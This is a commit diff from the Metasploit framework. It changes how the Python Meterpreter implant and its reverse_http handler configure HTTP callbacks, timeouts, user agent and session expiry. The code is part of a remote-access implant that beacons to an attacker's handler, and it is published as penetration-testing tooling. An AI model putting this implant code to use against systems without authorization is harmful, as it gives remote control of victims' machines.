Patch pymeterp http settings

Author: zeroSteiner

data/meterpreter/meterpreter.py

@@ -19,10 +19,11 @@
 	has_windll = hasattr(ctypes, 'windll')
 
 try:
+	urllib_imports = ['build_opener', 'install_opener', 'urlopen']
 	if sys.version_info[0] < 3:
-		urlopen = __import__('urllib', fromlist=['urlopen']).urlopen
+		urllib = __import__('urllib2', fromlist=urllib_imports)
 	else:
-		urlopen = __import__('urllib.request', fromlist=['urlopen']).urlopen
+		urllib = __import__('urllib.request', fromlist=urllib_imports)
 except ImportError:
 	has_urllib = False
 else:
@@ -42,8 +43,13 @@
 #
 # Constants
 #
-CONNECTION_URL = None
+
+# these values may be patched, DO NOT CHANGE THEM
 DEBUGGING = False
+HTTP_COMMUNICATION_TIMEOUT = 300
+HTTP_CONNECTION_URL = None
+HTTP_EXPIRATION_TIMEOUT = 604800
+HTTP_USER_AGENT = None
 
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
@@ -305,7 +311,7 @@ def __init__(self, socket=None):
 		self.communications_last = 0
 		if self.socket:
 			self.driver = 'tcp'
-		elif CONNECTION_URL:
+		elif HTTP_CONNECTION_URL:
 			self.driver = 'http'
 		self.extension_functions = {}
 		self.channels = {}
@@ -314,8 +320,17 @@ def __init__(self, socket=None):
 		for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
 			self.extension_functions[func[1:]] = getattr(self, func)
 		if self.driver:
+			if hasattr(self, 'driver_init_' + self.driver):
+				getattr(self, 'driver_init_' + self.driver)()
 			self.running = True
 
+	def driver_init_http(self):
+		opener = urllib.build_opener()
+		if HTTP_USER_AGENT:
+			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
+		urllib.install_opener(opener)
+		self._http_last_seen = time.time()
+
 	def register_function(self, func):
 		self.extension_functions[func.__name__] = func
 		return func
@@ -355,10 +370,13 @@ def send_packet(self, packet):
 	def get_packet_http(self):
 		packet = None
 		try:
-			url_h = urlopen(CONNECTION_URL, bytes('RECV', 'UTF-8'))
+			url_h = urllib.urlopen(HTTP_CONNECTION_URL, bytes('RECV', 'UTF-8'))
 			packet = url_h.read()
 		except:
-			pass
+			if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
+				self.running = False
+		else:
+			self._http_last_seen = time.time()
 		if packet:
 			packet = packet[8:]
 		else:
@@ -367,10 +385,13 @@ def get_packet_http(self):
 
 	def send_packet_http(self, packet):
 		try:
-			url_h = urlopen(CONNECTION_URL, packet)
+			url_h = urllib.urlopen(HTTP_CONNECTION_URL, packet)
 			response = url_h.read()
 		except:
-			pass
+			if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
+				self.running = False
+		else:
+			self._http_last_seen = time.time()
 
 	def get_packet_tcp(self):
 		packet = None
@@ -614,7 +635,7 @@ def create_response(self, request):
 			os.setsid()
 		except OSError:
 			pass
-	if CONNECTION_URL and has_urllib:
+	if HTTP_CONNECTION_URL and has_urllib:
 		met = PythonMeterpreter()
 	else:
 		met = PythonMeterpreter(s)

lib/msf/core/handler/reverse_http.rb

@@ -201,8 +201,11 @@ def on_request(cli, req, obj)
         blob = ""
         blob << obj.generate_stage
 
-        # Patch the conn_id
-        blob = blob.sub("CONNECTION_URL = None", "CONNECTION_URL = '#{url}'")
+        # Patch all the things
+        blob = blob.sub("HTTP_CONNECTION_URL = None", "HTTP_CONNECTION_URL = '#{url}'")
+        blob = blob.sub("HTTP_EXPIRATION_TIMEOUT = 604800", "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+        blob = blob.sub("HTTP_COMMUNICATION_TIMEOUT = 300", "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+        blob = blob.sub("HTTP_USER_AGENT = None", "HTTP_USER_AGENT = '#{datastore['MeterpreterUserAgent']}'")
 
         resp.body = blob
 
@@ -215,14 +218,15 @@ def on_request(cli, req, obj)
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
         })
+
       when /^\/INITJM/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
         url = payload_uri + conn_id + "/\x00"
 
         blob = ""
         blob << obj.generate_stage
 
-        # This is a TLV packet - I guess somewhere there should be API for building them
+        # This is a TLV packet - I guess somewhere there should be an API for building them
         # in Metasploit :-)
         packet = ""
         packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"

modules/payloads/stagers/python/reverse_http.rb

@@ -24,13 +24,6 @@ def initialize(info = {})
     ))
   end
 
-  #
-  # Do not transmit the stage over the connection.  We handle this via HTTPS
-  #
-  def stage_over_connection?
-    false
-  end
-
   #
   # Constructs the payload
   #
@@ -54,11 +47,4 @@ def generate
     b64_stub << "')))"
     return b64_stub
   end
-
-  #
-  # Always wait at least 20 seconds for this payload (due to staging delays)
-  #
-  def wfs_delay
-    20
-  end
 end